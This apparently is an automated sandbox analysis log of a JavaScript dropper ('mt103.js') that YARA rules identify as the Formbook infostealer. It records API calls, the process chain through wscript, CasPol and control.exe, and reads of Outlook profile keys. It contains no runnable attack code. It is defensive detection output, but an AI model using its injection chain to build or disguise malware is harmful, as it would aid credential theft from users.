          Source: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: mt103.js, type: SAMPLEMatched rule: SUSP_obfuscated_JS_obfuscatorio date = 2021-08-25, author = @imp0rtp3, description = Detects JS obfuscation done by the js obfuscator (often malicious), score = , reference = https://obfuscator.io
          Source: 9.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.396764487.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.396764487.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.781120251.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.781120251.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.781365309.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.781365309.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exeCode function: 8_2_02A20BD08_2_02A20BD0
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exeCode function: 8_2_02A248108_2_02A24810
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exeCode function: 8_2_02A209688_2_02A20968
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exeCode function: 8_2_02A209788_2_02A20978
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_004018409_2_00401840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0040C0439_2_0040C043
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_004018379_2_00401837
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0040C03F9_2_0040C03F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_004058839_2_00405883
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_004039039_2_00403903
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_004221DD9_2_004221DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_00401BE09_2_00401BE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_00421D3F9_2_00421D3F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_004056639_2_00405663
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_00422E299_2_00422E29
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_004206939_2_00420693
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_00421F089_2_00421F08
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017441209_2_01744120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0172F9009_2_0172F900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017E10029_2_017E1002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0173B0909_2_0173B090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0175EBB09_2_0175EBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017F1D559_2_017F1D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01720D209_2_01720D20
          Source: C:\Windows\explorer.exeCode function: 10_2_0598C39710_2_0598C397
          Source: C:\Windows\explorer.exeCode function: 10_2_0598C38710_2_0598C387
          Source: C:\Windows\explorer.exeCode function: 10_2_05989FB210_2_05989FB2
          Source: C:\Windows\explorer.exeCode function: 10_2_05989FAE10_2_05989FAE
          Source: C:\Windows\explorer.exeCode function: 10_2_0598BFD710_2_0598BFD7
          Source: C:\Windows\explorer.exeCode function: 10_2_0598CF5810_2_0598CF58
          Source: C:\Windows\explorer.exeCode function: 10_2_0598BD5210_2_0598BD52
          Source: C:\Windows\explorer.exeCode function: 10_2_0598729010_2_05987290
          Source: C:\Windows\explorer.exeCode function: 10_2_05988C8210_2_05988C82
          Source: C:\Windows\explorer.exeCode function: 10_2_0598C21210_2_0598C212
          Source: C:\Windows\explorer.exeCode function: 10_2_0598D81210_2_0598D812
          Source: C:\Windows\explorer.exeCode function: 10_2_0598C20710_2_0598C207
          Source: C:\Windows\explorer.exeCode function: 10_2_05986C5210_2_05986C52
          Source: C:\Windows\explorer.exeCode function: 10_2_0598BE7210_2_0598BE72
          Source: C:\Windows\explorer.exeCode function: 10_2_0598B27210_2_0598B272
          Source: C:\Windows\explorer.exeCode function: 10_2_06DBF29010_2_06DBF290
          Source: C:\Windows\explorer.exeCode function: 10_2_06DC0C8210_2_06DC0C82
          Source: C:\Windows\explorer.exeCode function: 10_2_06DBEC5210_2_06DBEC52
          Source: C:\Windows\explorer.exeCode function: 10_2_06DC327210_2_06DC3272
          Source: C:\Windows\explorer.exeCode function: 10_2_06DC3E7210_2_06DC3E72
          Source: C:\Windows\explorer.exeCode function: 10_2_06DC421210_2_06DC4212
          Source: C:\Windows\explorer.exeCode function: 10_2_06DC581210_2_06DC5812
          Source: C:\Windows\explorer.exeCode function: 10_2_06DC420710_2_06DC4207
          Source: C:\Windows\explorer.exeCode function: 10_2_06DC3FD710_2_06DC3FD7
          Source: C:\Windows\explorer.exeCode function: 10_2_06DC439710_2_06DC4397
          Source: C:\Windows\explorer.exeCode function: 10_2_06DC438710_2_06DC4387
          Source: C:\Windows\explorer.exeCode function: 10_2_06DC1FB210_2_06DC1FB2
          Source: C:\Windows\explorer.exeCode function: 10_2_06DC1FAE10_2_06DC1FAE
          Source: C:\Windows\explorer.exeCode function: 10_2_06DC4F5810_2_06DC4F58
          Source: C:\Windows\explorer.exeCode function: 10_2_06DC3D5210_2_06DC3D52
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0105F90011_2_0105F900
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01050D2011_2_01050D20
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0107412011_2_01074120
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01121D5511_2_01121D55
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0106D5E011_2_0106D5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0111100211_2_01111002
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0106841F11_2_0106841F
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0106B09011_2_0106B090
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108EBB011_2_0108EBB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01076E3011_2_01076E30
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_004F8D8011_2_004F8D80
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0050E86011_2_0050E860
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_004F383011_2_004F3830
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_004F3A5011_2_004F3A50
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_004FA20C11_2_004FA20C
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_004FA21011_2_004FA210
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_004F1AD011_2_004F1AD0
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0105B150 appears 32 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0041E593 NtCreateFile,9_2_0041E593
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0041E643 NtReadFile,9_2_0041E643
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0041E6C3 NtClose,9_2_0041E6C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0041E773 NtAllocateVirtualMemory,9_2_0041E773
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0041E58E NtCreateFile,9_2_0041E58E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0041E63D NtReadFile,9_2_0041E63D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0041E6BE NtClose,9_2_0041E6BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0041E76D NtAllocateVirtualMemory,9_2_0041E76D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01769910 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_01769910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017699A0 NtCreateSection,LdrInitializeThunk,9_2_017699A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01769860 NtQuerySystemInformation,LdrInitializeThunk,9_2_01769860
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01769840 NtDelayExecution,LdrInitializeThunk,9_2_01769840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017698F0 NtReadVirtualMemory,LdrInitializeThunk,9_2_017698F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01769A50 NtCreateFile,LdrInitializeThunk,9_2_01769A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01769A20 NtResumeThread,LdrInitializeThunk,9_2_01769A20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01769A00 NtProtectVirtualMemory,LdrInitializeThunk,9_2_01769A00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01769540 NtReadFile,LdrInitializeThunk,9_2_01769540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017695D0 NtClose,LdrInitializeThunk,9_2_017695D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01769710 NtQueryInformationToken,LdrInitializeThunk,9_2_01769710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01769FE0 NtCreateMutant,LdrInitializeThunk,9_2_01769FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017697A0 NtUnmapViewOfSection,LdrInitializeThunk,9_2_017697A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01769780 NtMapViewOfSection,LdrInitializeThunk,9_2_01769780
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01769660 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_01769660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017696E0 NtFreeVirtualMemory,LdrInitializeThunk,9_2_017696E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01769950 NtQueueApcThread,9_2_01769950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017699D0 NtCreateProcessEx,9_2_017699D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0176B040 NtSuspendThread,9_2_0176B040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01769820 NtEnumerateKey,9_2_01769820
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_017698A0 NtWriteVirtualMemory,9_2_017698A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01769B00 NtSetValueKey,9_2_01769B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0176A3B0 NtGetContextThread,9_2_0176A3B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01769A10 NtQuerySection,9_2_01769A10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01769A80 NtOpenDirectoryObject,9_2_01769A80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01769560 NtWriteFile,9_2_01769560
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0176AD30 NtSetContextThread,9_2_0176AD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_01769520 NtWaitForSingleObject,9_2_01769520
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01099910 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_01099910
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01099540 NtReadFile,LdrInitializeThunk,11_2_01099540
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01099560 NtWriteFile,LdrInitializeThunk,11_2_01099560
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010999A0 NtCreateSection,LdrInitializeThunk,11_2_010999A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010995D0 NtClose,LdrInitializeThunk,11_2_010995D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01099840 NtDelayExecution,LdrInitializeThunk,11_2_01099840
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01099860 NtQuerySystemInformation,LdrInitializeThunk,11_2_01099860
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01099710 NtQueryInformationToken,LdrInitializeThunk,11_2_01099710
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01099780 NtMapViewOfSection,LdrInitializeThunk,11_2_01099780
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01099FE0 NtCreateMutant,LdrInitializeThunk,11_2_01099FE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01099610 NtEnumerateValueKey,LdrInitializeThunk,11_2_01099610
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01099A50 NtCreateFile,LdrInitializeThunk,11_2_01099A50
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01099650 NtQueryValueKey,LdrInitializeThunk,11_2_01099650
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01099660 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_01099660
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010996D0 NtCreateKey,LdrInitializeThunk,11_2_010996D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010996E0 NtFreeVirtualMemory,LdrInitializeThunk,11_2_010996E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01099520 NtWaitForSingleObject,11_2_01099520
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0109AD30 NtSetContextThread,11_2_0109AD30
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01099950 NtQueueApcThread,11_2_01099950
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010999D0 NtCreateProcessEx,11_2_010999D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010995F0 NtQueryInformationFile,11_2_010995F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01099820 NtEnumerateKey,11_2_01099820
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0109B040 NtSuspendThread,11_2_0109B040
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010998A0 NtWriteVirtualMemory,11_2_010998A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010998F0 NtReadVirtualMemory,11_2_010998F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01099B00 NtSetValueKey,11_2_01099B00
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0109A710 NtOpenProcessToken,11_2_0109A710
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01099730 NtQueryVirtualMemory,11_2_01099730
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01099760 NtOpenProcess,11_2_01099760
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01099770 NtSetInformationFile,11_2_01099770
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0109A770 NtOpenThread,11_2_0109A770
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010997A0 NtUnmapViewOfSection,11_2_010997A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0109A3B0 NtGetContextThread,11_2_0109A3B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01099A00 NtProtectVirtualMemory,11_2_01099A00
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01099A10 NtQuerySection,11_2_01099A10
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01099A20 NtResumeThread,11_2_01099A20
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01099670 NtQueryInformationProcess,11_2_01099670
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01099A80 NtOpenDirectoryObject,11_2_01099A80
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0050C860 NtDeleteFile,11_2_0050C860
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0050C810 NtReadFile,11_2_0050C810
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0050C890 NtClose,11_2_0050C890
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0050C940 NtAllocateVirtualMemory,11_2_0050C940
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0050C760 NtCreateFile,11_2_0050C760
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0050C85A NtDeleteFile,11_2_0050C85A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0050C80A NtReadFile,11_2_0050C80A
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0050C88B NtClose,11_2_0050C88B
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0050C93A NtAllocateVirtualMemory,11_2_0050C93A
          Source: mt103.jsInitial sample: Strings found which are bigger than 50
          Source: HBhG[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: HBhG.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: mt103.jsReversingLabs: Detection: 23%
          Source: mt103.jsVirustotal: Detection: 29%
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\mt103.js"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\HBhG.exe "C:\Users\user\AppData\Local\Temp\HBhG.exe"
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\HBhG.exe "C:\Users\user\AppData\Local\Temp\HBhG.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exeJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90Jump to behavior
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\HBhG.exeJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winJS@9/4@21/15
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: HBhG[1].exe.0.dr, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.csCryptographic APIs: 'CreateDecryptor'
          Source: HBhG[1].exe.0.dr, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.csCryptographic APIs: 'CreateDecryptor'
          Source: HBhG.exe.0.dr, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.csCryptographic APIs: 'CreateDecryptor'
          Source: HBhG.exe.0.dr, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.csCryptographic APIs: 'CreateDecryptor'
          Source: 8.0.HBhG.exe.8a0000.0.unpack, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.csCryptographic APIs: 'CreateDecryptor'
          Source: 8.0.HBhG.exe.8a0000.0.unpack, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.csCryptographic APIs: 'CreateDecryptor'
          Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
